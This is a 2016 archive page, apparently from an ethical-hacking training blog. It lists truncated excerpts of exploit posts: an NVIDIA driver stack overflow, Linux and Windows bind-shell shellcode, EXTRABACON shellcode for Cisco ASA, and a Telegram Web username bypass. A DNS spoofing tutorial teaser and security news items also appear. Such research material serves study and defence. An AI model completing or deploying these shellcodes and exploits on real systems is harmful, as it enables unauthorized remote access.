Yearly Archives: 2016

NVIDIA Driver – NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Priv

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

The NvStreamKms.sys driver calls PsSetCreateProcessNotifyRoutineEx to set up a
process creation notification routine.
 
In this particular routine,
 
if ( cur->image_names_count > 0 ) {
  // info_ is the PPS_CREATE_NOTIFY_INFO that is passed to the routine.
  image_filename = info_->ImageFileName;
  buf = image_filename->Buffer;
  if ( buf )
  {
    if ( !v5 )
    {
      i = 0i64;
      num_chars = image_filename->Length […]

By |November 3rd, 2016|Exploits|

Linux/x86-64 – Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode

Credits: CripSlick
#include <stdio.h>
#include <string.h>
 

 
//|=========================================================================================
//|=============== CripSlick’s Persistent Bind-Shell with Port-Range + password ============
//|
//|
//| CODE 3 Has everything to offer that CODE2 has and more. CODE2 has everything to offer
//| that CODE1 has and more. CODE1 is still great due to being a very short bind shell.
//| […]

By |October 31st, 2016|Exploits|

Linux/x86 – NetCat Bind Shell with Port using C Programming

Credits: CripSlick
#include <stdio.h>
#include <string.h>
#include <unistd.h> //| needed for C “fork”
#include <stdlib.h> //| needed for C “system”
 
//|=====================================================================================================
//|================================ CripSlick’s Short NetCat Bind Shell ================================
//|
//|
//| Why use CripSlick’s NetCat Bind Shell?
//| Because it is short and that is about the only reason. If you can spare some bytes, I […]

By |October 31st, 2016|Exploits|

Windows/x86 – Password Protected TCP Bind Shell

Credits: Brother Roziul Hasan Khan
/*
    # Title : Windows x86 password protected bind shell tcp shellcode
    # size : 637 bytes
    # Tested On : Windows 7 ultimate x86 x64
*/
/*
Disassembly of section .text:
 
00000000 <_start>:
   0:   99                      cltd  
   1:   64 8b 42 30             mov    %fs:0x30(%edx),%eax
   5:   8b 40 0c                mov    0xc(%eax),%eax
   8:   8b […]

By |October 29th, 2016|Exploits|

Cisco ASA – Authentication Bypass ‘EXTRABACON’ (Improved Shellcode)

Credits: RiskSense
Cisco ASA Authentication Bypass (EXTRABACON) Better Shellcode (69 bytes);

 Description:
            This is not the same shellcode as the Equation Group version,
            but accomplishes the same task of disabling the auth functions
            […]

By |October 29th, 2016|Exploits|

Telegram Web 0.5.5 Username Bypass Vulnerability – Easy Mode

Credits: Malware4u
#########################################################################
# Exploit Title: Telegram Web Empty Username Bypass
# version : Telegram Web 0.5.5
# Tested on: Windows 10
##########################################################################
Description:
Telegram filters null bytes in username input, but you can bypass this
filter with “NOP”s (0x90) on the web version of Telegram because this
filter isn’t on the server’s code side
##########################################################################
Step 1:
First […]

By |October 29th, 2016|Exploits|

DNS Spoofing – Advanced LAN Hacking Technique

This tutorial is meant to be purely educational. By reading this tutorial, you agree that you will not replicate the steps I have listed below on ANY Wi-Fi but your own; and you will not use these techniques to manipulate the web requests of anyone […]

By |October 22nd, 2016|Papers|

Shodan A Search Engine For Hackers

Shodan: A Search Engine For Hackers
It’s true that we are increasingly connected day by day; this may be due to the Internet of Things (IoT). The Internet of Things consists of a complex network of systems and physical devices that allow devices to communicate and […]

By |October 8th, 2016|Papers|

Beware of fraudulent sites and fake offers misusing Flipkart’s name

Credits: Flipkart

During The Big Billion Days, stay clear of unauthorized websites and messages claiming to offer you unbelievable deals and discounts. Here’s a tip sheet for safe shopping.

Have you recently received an email, SMS or Whatsapp message from a website claiming to advertise unbelievable discounts […]

By |September 30th, 2016|Big Billion Days|

German Military Hacked Afghan Mobile Operator to Discover Hostage’s Whereabouts

A special cyber unit of the Bundeswehr (German Armed Forces) carried out Germany’s first-ever offensive cyber-operation by hacking into the network of an Afghan mobile operator to track the location of a group of kidnappers that had taken a young German woman hostage.

The woman, […]

By |September 25th, 2016|Exploits|